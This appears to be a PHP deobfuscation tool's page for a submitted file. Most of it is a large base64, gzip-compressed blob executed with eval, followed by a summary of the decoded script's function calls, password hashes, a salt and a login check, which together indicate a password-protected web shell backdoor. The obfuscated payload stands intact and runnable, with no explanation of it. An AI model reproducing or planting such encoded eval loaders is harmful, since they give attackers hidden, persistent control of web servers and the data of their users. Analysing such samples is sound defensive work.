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";
eval(gzinflate(base64_decode($code)));
?>div></body>
</html>

Function Calls

md5 3
trim 1
gzinflate 1
base64_decode 1
session_start 1
set_time_limit 1
error_reporting 1

Variables

$psw
$code 7X1rb+tIltj3APkPvBxP227Levoly9a9sizZ8ku2JEu27214KJISafFlknr5..
$pass 351e9513646af19c7f82b66c2caf60fd
$salt silic1234
$password 8f841a9b44b0167db6056389e0106af4
$chk_login 1

Stats

MD5 cb6ae6c65cd17c595b2c3f89f915962a
Eval Count 1
Decode Time 142 ms